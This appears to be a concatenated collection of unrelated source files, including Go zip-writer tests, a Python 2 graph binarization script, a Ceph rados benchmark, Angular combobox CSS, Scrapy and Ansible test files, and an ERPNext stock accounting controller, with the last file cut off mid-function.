t.Fatalf("Reader.Comment: got %v, want %v", r.Comment, test.comment)
}
}
}
func TestWriterUTF8(t *testing.T) {
utf8Tests := []struct {
name string
comment string
nonUTF8 bool
flags uint16
}{
{
name: "hi, hello",
comment: "in the world",
flags: 0x8,
},
{
name: "hi, こんにちわ",
comment: "in the world",
flags: 0x808,
},
{
name: "hi, こんにちわ",
comment: "in the world",
nonUTF8: true,
flags: 0x8,
},
{
name: "hi, hello",
comment: "in the 世界",
flags: 0x808,
},
{
name: "hi, こんにちわ",
comment: "in the 世界",
flags: 0x808,
},
{
name: "the replacement rune is �",
comment: "the replacement rune is �",
flags: 0x808,
},
{
// Name is Japanese encoded in Shift JIS.
name: "\x93\xfa\x96{\x8c\xea.txt",
comment: "in the 世界",
flags: 0x008, // UTF-8 must not be set
},
}
// write a zip file
buf := new(bytes.Buffer)
w := NewWriter(buf)
for _, test := range utf8Tests {
h := &FileHeader{
Name: test.name,
Comment: test.comment,
NonUTF8: test.nonUTF8,
Method: Deflate,
}
w, err := w.CreateHeader(h)
if err != nil {
t.Fatal(err)
}
w.Write([]byte{})
}
if err := w.Close(); err != nil {
t.Fatal(err)
}
// read it back
r, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
if err != nil {
t.Fatal(err)
}
for i, test := range utf8Tests {
flags := r.File[i].Flags
if flags != test.flags {
t.Errorf("CreateHeader(name=%q comment=%q nonUTF8=%v): flags=%#x, want %#x", test.name, test.comment, test.nonUTF8, flags, test.flags)
}
}
}
func TestWriterTime(t *testing.T) {
var buf bytes.Buffer
h := &FileHeader{
Name: "test.txt",
Modified: time.Date(2017, 10, 31, 21, 11, 57, 0, timeZone(-7*time.Hour)),
}
w := NewWriter(&buf)
if _, err := w.CreateHeader(h); err != nil {
t.Fatalf("unexpected CreateHeader error: %v", err)
}
if err := w.Close(); err != nil {
t.Fatalf("unexpected Close error: %v", err)
}
want, err := os.ReadFile("testdata/time-go.zip")
if err != nil {
t.Fatalf("unexpected ReadFile error: %v", err)
}
if got := buf.Bytes(); !bytes.Equal(got, want) {
fmt.Printf("%x\n%x\n", got, want)
t.Error("contents of time-go.zip differ")
}
}
func TestWriterOffset(t *testing.T) {
largeData := make([]byte, 1<<17)
if _, err := rand.Read(largeData); err != nil {
t.Fatal("rand.Read failed:", err)
}
writeTests[1].Data = largeData
defer func() {
writeTests[1].Data = nil
}()
// write a zip file
buf := new(bytes.Buffer)
existingData := []byte{1, 2, 3, 1, 2, 3, 1, 2, 3}
n, _ := buf.Write(existingData)
w := NewWriter(buf)
w.SetOffset(int64(n))
for _, wt := range writeTests {
testCreate(t, w, &wt)
}
if err := w.Close(); err != nil {
t.Fatal(err)
}
// read it back
r, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
if err != nil {
t.Fatal(err)
}
for i, wt := range writeTests {
testReadFile(t, r.File[i], &wt)
}
}
func TestWriterFlush(t *testing.T) {
var buf bytes.Buffer
w := NewWriter(struct{ io.Writer }{&buf})
_, err := w.Create("foo")
if err != nil {
t.Fatal(err)
}
if buf.Len() > 0 {
t.Fatalf("Unexpected %d bytes already in buffer", buf.Len())
}
if err := w.Flush(); err != nil {
t.Fatal(err)
}
if buf.Len() == 0 {
t.Fatal("No bytes written after Flush")
}
}
func TestWriterDir(t *testing.T) {
w := NewWriter(io.Discard)
dw, err := w.Create("dir/")
if err != nil {
t.Fatal(err)
}
if _, err := dw.Write(nil); err != nil {
t.Errorf("Write(nil) to directory: got %v, want nil", err)
}
if _, err := dw.Write([]byte("hello")); err == nil {
t.Error(`Write("hello") to directory: got nil error, want non-nil`)
}
}
func TestWriterDirAttributes(t *testing.T) {
var buf bytes.Buffer
w := NewWriter(&buf)
if _, err := w.CreateHeader(&FileHeader{
Name: "dir/",
Method: Deflate,
CompressedSize64: 1234,
UncompressedSize64: 5678,
}); err != nil {
t.Fatal(err)
}
if err := w.Close(); err != nil {
t.Fatal(err)
}
b := buf.Bytes()
var sig [4]byte
binary.LittleEndian.PutUint32(sig[:], uint32(fileHeaderSignature))
idx := bytes.Index(b, sig[:])
if idx == -1 {
t.Fatal("file header not found")
}
b = b[idx:]
if !bytes.Equal(b[6:10], []byte{0, 0, 0, 0}) { // FileHeader.Flags: 0, FileHeader.Method: 0
t.Errorf("unexpected method and flags: %v", b[6:10])
}
if !bytes.Equal(b[14:26], make([]byte, 12)) { // FileHeader.{CRC32,CompressSize,UncompressedSize} all zero.
t.Errorf("unexpected crc, compress and uncompressed size to be 0 was: %v", b[14:26])
}
binary.LittleEndian.PutUint32(sig[:], uint32(dataDescriptorSignature))
if bytes.Contains(b, sig[:]) {
t.Error("there should be no data descriptor")
}
}
func TestWriterCopy(t *testing.T) {
// make a zip file
buf := new(bytes.Buffer)
w := NewWriter(buf)
for _, wt := range writeTests {
testCreate(t, w, &wt)
}
if err := w.Close(); err != nil {
t.Fatal(err)
}
// read it back
src, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
if err != nil {
t.Fatal(err)
}
for i, wt := range writeTests {
testReadFile(t, src.File[i], &wt)
}
// make a new zip file copying the old compressed data.
buf2 := new(bytes.Buffer)
dst := NewWriter(buf2)
for _, f := range src.File {
if err := dst.Copy(f); err != nil {
t.Fatal(err)
}
}
if err := dst.Close(); err != nil {
t.Fatal(err)
}
// read the new one back
r, err := NewReader(bytes.NewReader(buf2.Bytes()), int64(buf2.Len()))
if err != nil {
t.Fatal(err)
}
for i, wt := range writeTests {
testReadFile(t, r.File[i], &wt)
}
}
func TestWriterCreateRaw(t *testing.T) {
files := []struct {
name string
content []byte
method uint16
flags uint16
crc32 uint32
uncompressedSize uint64
compressedSize uint64
}{
{
name: "small store w desc",
content: []byte("gophers"),
method: Store,
flags: 0x8,
},
{
name: "small deflate wo desc",
content: bytes.Repeat([]byte("abcdefg"), 2048),
method: Deflate,
},
}
// write a zip file
archive := new(bytes.Buffer)
w := NewWriter(archive)
for i := range files {
f := &files[i]
f.crc32 = crc32.ChecksumIEEE(f.content)
size := uint64(len(f.content))
f.uncompressedSize = size
f.compressedSize = size
var compressedContent []byte
if f.method == Deflate {
var buf bytes.Buffer
w, err := flate.NewWriter(&buf, flate.BestSpeed)
if err != nil {
t.Fatalf("flate.NewWriter err = %v", err)
}
_, err = w.Write(f.content)
if err != nil {
t.Fatalf("flate Write err = %v", err)
}
err = w.Close()
if err != nil {
t.Fatalf("flate Writer.Close err = %v", err)
}
compressedContent = buf.Bytes()
f.compressedSize = uint64(len(compressedContent))
}
h := &FileHeader{
Name: f.name,
Method: f.method,
Flags: f.flags,
CRC32: f.crc32,
CompressedSize64: f.compressedSize,
UncompressedSize64: f.uncompressedSize,
}
w, err := w.CreateRaw(h)
if err != nil {
t.Fatal(err)
}
if compressedContent != nil {
_, err = w.Write(compressedContent)
} else {
_, err = w.Write(f.content)
}
if err != nil {
t.Fatalf("%s Write got %v; want nil", f.name, err)
}
}
if err := w.Close(); err != nil {
t.Fatal(err)
}
// read it back
r, err := NewReader(bytes.NewReader(archive.Bytes()), int64(archive.Len()))
if err != nil {
t.Fatal(err)
}
for i, want := range files {
got := r.File[i]
if got.Name != want.name {
t.Errorf("got Name %s; want %s", got.Name, want.name)
}
if got.Method != want.method {
t.Errorf("%s: got Method %#x; want %#x", want.name, got.Method, want.method)
}
if got.Flags != want.flags {
t.Errorf("%s: got Flags %#x; want %#x", want.name, got.Flags, want.flags)
}
if got.CRC32 != want.crc32 {
t.Errorf("%s: got CRC32 %#x; want %#x", want.name, got.CRC32, want.crc32)
}
if got.CompressedSize64 != want.compressedSize {
t.Errorf("%s: got CompressedSize64 %d; want %d", want.name, got.CompressedSize64, want.compressedSize)
}
if got.UncompressedSize64 != want.uncompressedSize {
t.Errorf("%s: got UncompressedSize64 %d; want %d", want.name, got.UncompressedSize64, want.uncompressedSize)
}
r, err := got.Open()
if err != nil {
t.Errorf("%s: Open err = %v", got.Name, err)
continue
}
buf, err := io.ReadAll(r)
if err != nil {
t.Errorf("%s: ReadAll err = %v", got.Name, err)
continue
}
if !bytes.Equal(buf, want.content) {
t.Errorf("%v: ReadAll returned unexpected bytes", got.Name)
}
}
}
func testCreate(t *testing.T, w *Writer, wt *WriteTest) {
header := &FileHeader{
Name: wt.Name,
Method: wt.Method,
}
if wt.Mode != 0 {
header.SetMode(wt.Mode)
}
f, err := w.CreateHeader(header)
if err != nil {
t.Fatal(err)
}
_, err = f.Write(wt.Data)
if err != nil {
t.Fatal(err)
}
}
func testReadFile(t *testing.T, f *File, wt *WriteTest) {
if f.Name != wt.Name {
t.Fatalf("File name: got %q, want %q", f.Name, wt.Name)
}
testFileMode(t, f, wt.Mode)
rc, err := f.Open()
if err != nil {
t.Fatalf("opening %s: %v", f.Name, err)
}
b, err := io.ReadAll(rc)
if err != nil {
t.Fatalf("reading %s: %v", f.Name, err)
}
err = rc.Close()
if err != nil {
t.Fatalf("closing %s: %v", f.Name, err)
}
if !bytes.Equal(b, wt.Data) {
t.Errorf("File contents %q, want %q", b, wt.Data)
}
}
func BenchmarkCompressedZipGarbage(b *testing.B) {
bigBuf := bytes.Repeat([]byte("a"), 1<<20)
runOnce := func(buf *bytes.Buffer) {
buf.Reset()
zw := NewWriter(buf)
for j := 0; j < 3; j++ {
w, _ := zw.CreateHeader(&FileHeader{
Name: "foo",
Method: Deflate,
})
w.Write(bigBuf)
}
zw.Close()
}
b.ReportAllocs()
// Run once and then reset the timer.
// This effectively discards the very large initial flate setup cost,
// as well as the initialization of bigBuf.
runOnce(&bytes.Buffer{})
b.ResetTimer()
b.RunParallel(func(pb *testing.PB) {
var buf bytes.Buffer
for pb.Next() {
runOnce(&buf)
}
})
}
func writeTestsToFS(tests []WriteTest) fs.FS {
fsys := fstest.MapFS{}
for _, wt := range tests {
fsys[wt.Name] = &fstest.MapFile{
Data: wt.Data,
Mode: wt.Mode,
}
}
return fsys
}
func TestWriterAddFS(t *testing.T) {
buf := new(bytes.Buffer)
w := NewWriter(buf)
tests := []WriteTest{
{Name: "emptyfolder", Mode: 0o755 | os.ModeDir},
{Name: "file.go", Data: []byte("hello"), Mode: 0644},
{Name: "subfolder/another.go", Data: []byte("world"), Mode: 0644},
// Notably missing here is the "subfolder" directory. This makes sure even
// if we don't have a subfolder directory listed.
}
err := w.AddFS(writeTestsToFS(tests))
if err != nil {
t.Fatal(err)
}
if err := w.Close(); err != nil {
t.Fatal(err)
}
// Add subfolder into fsys to match what we'll read from the zip.
tests = append(tests[:2:2], WriteTest{Name: "subfolder", Mode: 0o555 | os.ModeDir}, tests[2])
// read it back
r, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
if err != nil {
t.Fatal(err)
}
for i, wt := range tests {
if wt.Mode.IsDir() {
wt.Name += "/"
}
testReadFile(t, r.File[i], &wt)
}
}
func TestIssue61875(t *testing.T) {
buf := new(bytes.Buffer)
w := NewWriter(buf)
tests := []WriteTest{
{
Name: "symlink",
Data: []byte("../link/target"),
Method: Deflate,
Mode: 0755 | fs.ModeSymlink,
},
{
Name: "device",
Data: []byte(""),
Method: Deflate,
Mode: 0755 | fs.ModeDevice,
},
}
err := w.AddFS(writeTestsToFS(tests))
if err == nil {
t.Errorf("expected error, got nil")
}
} | go | github | https://github.com/golang/go | src/archive/zip/writer_test.go |
#! /usr/bin/env python
# Script to convert grounding files in TSV format to binary format for dimmwitted sampler
# Usage: python tobinary.py [input folder] transform_script [output folder]
# It split the specific files in the input folder and for each of them calls the C++ binary to convert the format
import sys
import re
import os
# set up parameters
CHUNKSIZE = '10000000'
INPUTFOLDER = sys.argv[1]
transform_script = sys.argv[2]
OUTPUTFOLDER = sys.argv[3]
# clean up folder
os.system('rm -rf ' + INPUTFOLDER + "/dd_tmp")
os.system('mkdir -p ' + INPUTFOLDER + "/dd_tmp")
os.system('rm -rf ' + INPUTFOLDER + "/nedges_")
if not os.path.isfile(INPUTFOLDER + "/dd_factormeta"):
os.system("touch %s/dd_factormeta" %INPUTFOLDER)
# handle factors
for l in open(INPUTFOLDER + "/dd_factormeta"):
(factor_name, function_id, positives) = l.split('\t')
positives = positives.strip().replace('true', '1').replace('false', '0').split(' ')
nvars = '%d' % len(positives)
print "SPLITTING", factor_name, "..."
os.system('split -a 4 -l ' + CHUNKSIZE + ' ' + INPUTFOLDER + '/dd_factors_' + factor_name + '_out ' + INPUTFOLDER + '/dd_tmp/dd_factors_' + factor_name + '_out')
print "BINARIZE ", factor_name, "..."
os.system('ls ' + INPUTFOLDER + '/dd_tmp | egrep "^dd_factors_' + factor_name + '_out" | xargs -P 40 -I {} -n 1 sh -c \'' + transform_script + ' factor ' + INPUTFOLDER + '/dd_tmp/{} ' + function_id + ' ' + nvars + ' ' + (' '.join(positives)) + ' \' | awk \'{s+=$1} END {printf \"%.0f\\n\", s}\' >>' + INPUTFOLDER + "/dd_nedges_")
# handle variables
for f in os.listdir(INPUTFOLDER):
if f.startswith('dd_variables_'):
print "SPLITTING", f, "..."
os.system("touch %s/dd_tmp/%s" %(INPUTFOLDER, f))
os.system('split -a 4 -l ' + CHUNKSIZE + ' ' + INPUTFOLDER + '/' + f + ' ' + INPUTFOLDER + '/dd_tmp/' + f)
print "BINARIZE ", f, "..."
os.system('ls ' + INPUTFOLDER + '/dd_tmp | egrep "^' + f + '" | xargs -P 40 -I {} -n 1 sh -c \'' + transform_script + ' variable ' + INPUTFOLDER + '/dd_tmp/{} \'')
# handle weights
print "BINARIZE ", 'weights', "..."
os.system(transform_script + ' weight ' + INPUTFOLDER + '/dd_weights')
# move files
os.system('rm -rf ' + INPUTFOLDER + "/dd_factors")
os.system('mkdir -p ' + INPUTFOLDER + "/dd_factors")
os.system('mv ' + INPUTFOLDER + '/dd_tmp/dd_factors*.bin ' + INPUTFOLDER + '/dd_factors')
os.system('rm -rf ' + INPUTFOLDER + "/dd_variables")
os.system('mkdir -p ' + INPUTFOLDER + "/dd_variables")
os.system('mv ' + INPUTFOLDER + '/dd_tmp/dd_variables*.bin ' + INPUTFOLDER + '/dd_variables')
nfactor_files = 0
nvariable_files = 0
# counting
print "COUNTING", "variables", "..."
os.system('wc -l ' + INPUTFOLDER + "/dd_tmp/dd_variables_* | tail -n 1 | sed -e 's/^[ \t]*//g' | cut -d ' ' -f 1 > " + INPUTFOLDER + '/dd_nvariables_wc')
os.system('export dd_nvar=`cat ' + INPUTFOLDER + '/dd_nvariables_wc`; echo $dd_nvar + %d | bc > ' % nvariable_files + INPUTFOLDER + '/dd_nvariables; unset dd_nvar')
print "COUNTING", "factors", "..."
os.system('wc -l ' + INPUTFOLDER + "/dd_tmp/dd_factors_* | tail -n 1 | sed -e 's/^[ \t]*//g' | cut -d ' ' -f 1 > " + INPUTFOLDER + '/dd_nfactors_wc')
os.system('export dd_nfact=`cat ' + INPUTFOLDER + '/dd_nfactors_wc`; echo $dd_nfact + %d | bc > ' % nfactor_files + INPUTFOLDER + '/dd_nfactors; unset dd_nfact')
print "COUNTING", "weights", "..."
os.system('wc -l ' + INPUTFOLDER + "/dd_weights | tail -n 1 | sed -e 's/^[ \t]*//g' | cut -d ' ' -f 1 > " + INPUTFOLDER + '/dd_nweights')
os.system("awk '{{ sum += $1 }} END {{ printf \"%.0f\\n\", sum }}' {0}/dd_nedges_ > {0}/dd_nedges".format(INPUTFOLDER))
# concatenate files
print "CONCATENATING FILES..."
os.system("cat {0}/dd_nweights {0}/dd_nvariables {0}/dd_nfactors {0}/dd_nedges | tr '\n' ',' > {0}/graph.meta".format(INPUTFOLDER))
os.system("echo {0}/graph.weights,{0}/graph.variables,{0}/graph.factors,{0}/graph.edges >> {1}/graph.meta".format(OUTPUTFOLDER, INPUTFOLDER))
if INPUTFOLDER != OUTPUTFOLDER:
os.system("mv {0}/graph.meta {1}/graph.meta".format(INPUTFOLDER, OUTPUTFOLDER))
os.system("mv {0}/dd_weights.bin {1}/graph.weights".format(INPUTFOLDER, OUTPUTFOLDER))
os.system("cat {0}/dd_variables/* > {1}/graph.variables".format(INPUTFOLDER, OUTPUTFOLDER))
os.system("cat {0}/dd_factors/dd_factors*factors.bin > {1}/graph.factors".format(INPUTFOLDER, OUTPUTFOLDER))
os.system("cat {0}/dd_factors/dd_factors*edges.bin > {1}/graph.edges".format(INPUTFOLDER, OUTPUTFOLDER))
# clean up folder
print "Cleaning up files"
os.system('rm -rf {0}/dd_*'.format(INPUTFOLDER)) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python
# import necessary library.
import threading
import sys
import rados
import socket
import time
import os
import getopt
# create an interface class.
class multithread (threading.Thread):
# define init process.
def __init__(self, threadID, name, size, number):
threading.Thread.__init__(self)
# the thread id.
self.threadID = threadID
# the thread name.
self.name = name
# the size of an object.
self.size = size
# and the thread number to pass to each thread.
self.number = number
def run(self):
#print "Starting " + self.name
# call another function to process the test, pass the thread name to it.
performancetest(self.name, self.size, self.number)
#print "Exiting " + self.name
# create a function to do the performance test.
def performancetest(threadName, objectsize, threadnumber):
# add host name to each thread.
hostname = socket.gethostname()
objectname = hostname + threadName
# create an empty data.
data = ''
# create two local file, one for write test and the other for read test.
localreadfilename = "/tmp/localreadfileobj" + threadName
localwritefilename = "/tmp/localwritefileobj" + threadName
# delete local read files if exists.
try:
if os.path.isfile(localreadfilename):
os.remove(localreadfilename)
except TypeError as e:
print hostname, ' - ', threadName, ' - ', e
# delete local write files if exists.
try:
if os.path.isfile(localwritefilename):
os.remove(localwritefilename)
except TypeError as e:
print hostname, ' - ', threadName, ' - ', e
# open the local file to fill some random data.
#openfile = open(localwritefilename,"w")
#openfile.write("1001101011")
#openfile.close()
# using librados to create a cluster handle.
try:
cluster = rados.Rados(conffile='')
# exit program if any error.
except TypeError as e:
#print hostname, ' - ', threadName, ' - Argument validation error: ', e
raise e
#print hostname, ' - ', threadName, " - Created cluster handle."
# using librados to connect to ceph.
try:
cluster.connect()
# exit program if any error.
except Exception as e:
#print hostname, ' - ', threadName, " - connection error: ", e
raise e
# if no errors, print the info that cluster has been connected.
#finally:
#print hostname, ' - ', threadName, " - Connected to the cluster."
#print hostname, ' - ', threadName, " - Creating a context for the pool 'rbd'."
# search the pool by given name.
# exit if no such pool.
if not cluster.pool_exists('rbd'):
raise RuntimeError('No rbd pool exists')
# if the pool exsits, open it for later use.
ioctx = cluster.open_ioctx('rbd')
###################################
# remove an object from ceph.
# 1. remove an object from ceph cluster.
###################################
#print hostname, ' - ', threadName, " - Removing objectfrom pool 'rbd'."
# mark begin time
dbegintime = time.time()
# remove the object by object name.
try:
ioctx.remove_object(objectname)
except:
print hostname, ' - ', threadName, ' - No such object, continue'
# mark end time
dendtime = time.time()
ioctx.close()
###################################
# write an object into ceph.
# 1. read some data from a local file.
# 2. save the string.
# 3. write the data to ceph cluster.
###################################
#print hostname, ' - ', threadName, " - Writing object with contents to pool 'rbd'."
# open the file to read
#openfile = open(localwritefilename,"r")
# read the file into variable data.
#data = openfile.read();
# close the file.
#openfile.close()
# mark begin time.
wbegintime = time.time()
# search the pool by given name.
# exit if no such pool.
if not cluster.pool_exists('rbd'):
raise RuntimeError('No rbd pool exists')
# if the pool exsits, open it for later use.
ioctx = cluster.open_ioctx('rbd')
# write data into object storage by object name.
for i in range(0,objectsize / 10):
data = data + '1001011010'
ioctx.write(objectname, data)
# mark end time.
wendtime = time.time()
# save the size the ceph wrote.
#wsize = os.path.getsize(localwritefilename)
ioctx.close()
# clean the cache
with open('/proc/sys/vm/drop_caches', 'w') as stream:
stream.write('1\n')
###################################
# read an object from ceph.
# 1. read some data from ceph cluster.
# 2. save the string.
# 3. write the data to a local file.
###################################
#print hostname, ' - ', threadName, " - Reading object with contents from pool 'rbd'."
# mark begin time
rbegintime = time.time()
# search the pool by given name.
# exit if no such pool.
if not cluster.pool_exists('rbd'):
raise RuntimeError('No rbd pool exists')
# if the pool exsits, open it for later use.
ioctx = cluster.open_ioctx('rbd')
# read data from ceph by object name and size.
# then save the string into variable data.
data = ioctx.read(objectname,objectsize)
# mark end time
rendtime = time.time()
ioctx.close()
# open the local file to write.
openfile = open(localreadfilename,"a")
# write data into local file.
openfile.write(data)
# close the open file.
openfile.close()
# save the size the ceph read.
rsize = os.path.getsize(localreadfilename)
# close the connection to ceph cluster.
#print hostname, ' - ', threadName, " - Closing the connection."
#ioctx.close()
# shutdown the cluster handle.
#print hostname, ' - ', threadName, " - Shutting down the handle."
cluster.shutdown()
# print the object size that read from and wrote to ceph.
#print hostname, ' - ', threadName, " - Size(Write): %f ." %wsize
#print hostname, ' - ', threadName, " - Size(Read): %f ." %rsize
# print the period for each operations.
#print hostname, ' - ', threadName, " - Seconds(Write): %f ." %(wendtime - wbegintime)
#print hostname, ' - ', threadName, " - Seconds(Read): %f ." %(rendtime - rbegintime)
#print hostname, ' - ', threadName, " - Seconds(Remove): %f ." %(dendtime - dbegintime)
#print hostname, ' - ', threadName, " - Total Seconds: %f ." %((wendtime - wbegintime) + (rendtime - rbegintime) + (dendtime - dbegintime))
# clean the cache
with open('/proc/sys/vm/drop_caches', 'w') as stream:
stream.write('1\n')
# main function
def main(argv):
# get thread number and object size form parameters
threadnumber = 0
objectsize = 0
# get thread number and object size form parameters
try:
opts, args = getopt.getopt(argv,"ht:s:",["threadnumber=","objectsize="])
except getopt.GetoptError:
# if the parameter format is wrong, print the help
print 'c-obj.py -t <threadnumber> -s <objectsize>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'c-obj.py -t <threadnumber> -s <objectsize(byte)>'
print 'Please limit the thread number under 1000 and object size under 1MB'
print 'since the test server is t2.small (low performance)'
sys.exit()
elif opt in ("-t", "--threadnumber"):
if int(arg) > 1000:
print 'Please limit the thread number under 1000 and object size under 1MB'
print 'since the test server is t2.small (low performance)'
sys.exit(2)
threadnumber = int(arg)
elif opt in ("-s", "--objectsize"):
if int(arg) > 1000000:
print 'Please limit the thread number under 1000 and object size under 1MB'
print 'since the test server is t2.small (low performance)'
sys.exit(2)
objectsize = int(arg)
# multi threading
for i in range(0,threadnumber):
thr = multithread(i, "Thread-%d" %i, objectsize, threadnumber)
thr.start()
# program entry
if __name__ == "__main__":
main(sys.argv[1:]) | unknown | codeparrot/codeparrot-clean | ||
@import url('https://fonts.googleapis.com/icon?family=Material+Symbols+Outlined');
:host {
display: flex;
justify-content: center;
font-family: var(--inter-font, system-ui, sans-serif);
--border-color: color-mix(in srgb, var(--full-contrast, #000) 20%, var(--page-background, #fff));
--primary: var(--vivid-pink, #f542a4);
}
[ngCombobox] {
position: relative;
width: 100%;
display: flex;
flex-direction: column;
border: 1px solid var(--border-color);
border-radius: 1rem;
}
[ngCombobox]:has([readonly='true']) {
width: 15rem;
}
.combobox-input-container {
display: flex;
position: relative;
align-items: center;
border-radius: 1rem;
}
[ngComboboxInput] {
border-radius: 1rem;
}
[ngComboboxInput][readonly='true'] {
cursor: pointer;
padding: 0.7rem 1rem;
}
[ngCombobox]:focus-within [ngComboboxInput] {
outline: none;
box-shadow: none;
}
.icon {
width: 24px;
height: 24px;
font-size: 20px;
display: grid;
place-items: center;
pointer-events: none;
}
.search-icon {
padding: 0 0.5rem;
position: absolute;
opacity: 0.8;
}
.arrow-icon {
padding: 0 0.5rem;
position: absolute;
right: 0;
opacity: 0.8;
transition: transform 0.2s ease;
}
[ngComboboxInput][aria-expanded='true'] + .arrow-icon {
transform: rotate(180deg);
}
[ngComboboxInput] {
width: 100%;
border: none;
outline: none;
font-size: 1rem;
padding: 0.7rem 1rem 0.7rem 2.5rem;
background-color: var(--septenary-contrast, #f5f5f5);
color: var(--primary-contrast, #1a1a1a);
}
[ngListbox] {
gap: 2px;
max-height: 10rem;
display: flex;
overflow: auto;
flex-direction: column;
}
[ngOption] {
display: flex;
cursor: pointer;
align-items: center;
margin: 1px;
padding: 1rem;
min-height: 1rem;
border-radius: 1rem;
}
[ngOption]:hover,
[ngOption][data-active='true'] {
background-color: color-mix(in srgb, var(--primary-contrast, #1a1a1a) 5%, transparent);
}
[ngOption][data-active='true'] {
outline-offset: -2px;
outline: 2px solid var(--primary);
}
[ngOption][aria-selected='true'] {
color: var(--primary);
background-color: color-mix(in srgb, var(--primary) 10%, transparent);
}
[ngOption]:not([aria-selected='true']) .check-icon {
display: none;
}
.option-label {
flex: 1;
}
.check-icon {
font-size: 0.9rem;
}
.dialog {
padding: none;
position: absolute;
left: auto;
right: auto;
top: auto;
bottom: auto;
border: 1px solid var(--border-color);
border-radius: 1rem;
background-color: var(--septenary-contrast, #f5f5f5);
color: inherit;
}
.dialog .combobox-input-container {
border-radius: 0;
}
.dialog [ngCombobox],
.dialog .combobox-input-container {
border: none;
}
.dialog [ngComboboxInput] {
border-bottom-left-radius: 0;
border-bottom-right-radius: 0;
}
[ngCombobox]:focus-within [ngComboboxInput]:not(.combobox-input) {
outline: 1.5px solid var(--vivid-pink);
box-shadow: 0 0 0 4px color-mix(in srgb, var(--vivid-pink) 25%, transparent);
}
.dialog::backdrop {
opacity: 0;
}
.no-results {
padding: 1rem;
} | css | github | https://github.com/angular/angular | adev/src/content/examples/aria/combobox/src/dialog/material/app/app.css |
import scrapy
from scrapy.crawler import CrawlerProcess
class AsyncioReactorSpider1(scrapy.Spider):
name = "asyncio_reactor1"
custom_settings = {
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
}
class AsyncioReactorSpider2(scrapy.Spider):
name = "asyncio_reactor2"
custom_settings = {
"TWISTED_REACTOR": "twisted.internet.asyncioreactor.AsyncioSelectorReactor",
}
process = CrawlerProcess()
process.crawl(AsyncioReactorSpider1)
process.crawl(AsyncioReactorSpider2)
process.start() | python | github | https://github.com/scrapy/scrapy | tests/CrawlerProcess/twisted_reactor_custom_settings_same.py |
- assert:
that:
- 'secret_var == "secret"'
- copy: src=vault-secret.txt dest={{output_dir}}/secret.txt
- name: cleanup decrypted file
file: path={{ output_dir }}/secret.txt state=absent | unknown | github | https://github.com/ansible/ansible | test/integration/targets/ansible-vault/roles/test_vault/tasks/main.yml |
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.utils import cint, flt, cstr
from webnotes import msgprint, _
import webnotes.defaults
from controllers.accounts_controller import AccountsController
from accounts.general_ledger import make_gl_entries, delete_gl_entries
class StockController(AccountsController):
def make_gl_entries(self, update_gl_entries_after=True):
if self.doc.docstatus == 2:
delete_gl_entries(voucher_type=self.doc.doctype, voucher_no=self.doc.name)
if cint(webnotes.defaults.get_global_default("auto_accounting_for_stock")):
warehouse_account = self.get_warehouse_account()
if self.doc.docstatus==1:
gl_entries = self.get_gl_entries(warehouse_account)
make_gl_entries(gl_entries)
if update_gl_entries_after:
self.update_gl_entries_after(warehouse_account)
def get_gl_entries(self, warehouse_account=None, default_expense_account=None,
default_cost_center=None):
from accounts.general_ledger import process_gl_map
if not warehouse_account:
warehouse_account = self.get_warehouse_account()
stock_ledger = self.get_stock_ledger_details()
voucher_details = self.get_voucher_details(stock_ledger, default_expense_account,
default_cost_center)
gl_list = []
warehouse_with_no_account = []
for detail in voucher_details:
sle_list = stock_ledger.get(detail.name)
if sle_list:
for sle in sle_list:
if warehouse_account.get(sle.warehouse):
# from warehouse account
gl_list.append(self.get_gl_dict({
"account": warehouse_account[sle.warehouse],
"against": detail.expense_account,
"cost_center": detail.cost_center,
"remarks": self.doc.remarks or "Accounting Entry for Stock",
"debit": flt(sle.stock_value_difference, 2)
}))
# to target warehouse / expense account
gl_list.append(self.get_gl_dict({
"account": detail.expense_account,
"against": warehouse_account[sle.warehouse],
"cost_center": detail.cost_center,
"remarks": self.doc.remarks or "Accounting Entry for Stock",
"credit": flt(sle.stock_value_difference, 2)
}))
elif sle.warehouse not in warehouse_with_no_account:
warehouse_with_no_account.append(sle.warehouse)
if warehouse_with_no_account:
msgprint(_("No accounting entries for following warehouses") + ": \n" +
"\n".join(warehouse_with_no_account))
return process_gl_map(gl_list)
def get_voucher_details(self, stock_ledger, default_expense_account, default_cost_center):
if not default_expense_account:
details = self.doclist.get({"parentfield": self.fname})
for d in details:
self.check_expense_account(d)
else:
details = [webnotes._dict({
"name":d,
"expense_account": default_expense_account,
"cost_center": default_cost_center
}) for d in stock_ledger.keys()]
return details
def get_stock_ledger_details(self):
stock_ledger = {}
for sle in webnotes.conn.sql("""select warehouse, stock_value_difference, voucher_detail_no
from `tabStock Ledger Entry` where voucher_type=%s and voucher_no=%s""",
(self.doc.doctype, self.doc.name), as_dict=True):
stock_ledger.setdefault(sle.voucher_detail_no, []).append(sle)
return stock_ledger
def get_warehouse_account(self):
warehouse_account = dict(webnotes.conn.sql("""select master_name, name from tabAccount
where account_type = 'Warehouse' and ifnull(master_name, '') != ''"""))
return warehouse_account
def update_gl_entries_after(self, warehouse_account=None):
future_stock_vouchers = self.get_future_stock_vouchers()
gle = self.get_voucherwise_gl_entries(future_stock_vouchers)
if not warehouse_account:
warehouse_account = self.get_warehouse_account()
for voucher_type, voucher_no in future_stock_vouchers:
existing_gle = gle.get((voucher_type, voucher_no), [])
voucher_obj = webnotes.get_obj(voucher_type, voucher_no)
expected_gle = voucher_obj.get_gl_entries(warehouse_account)
if expected_gle:
matched = True
if existing_gle:
for entry in expected_gle:
for e in existing_gle:
if entry.account==e.account \
and entry.against_account==e.against_account\
and entry.cost_center==e.cost_center:
if entry.debit != e.debit or entry.credit != e.credit:
matched = False
break
else:
matched = False
if not matched:
self.delete_gl_entries(voucher_type, voucher_no)
voucher_obj.make_gl_entries(update_gl_entries_after=False)
else:
self.delete_gl_entries(voucher_type, voucher_no)
def get_future_stock_vouchers(self):
future_stock_vouchers = []
if hasattr(self, "fname"):
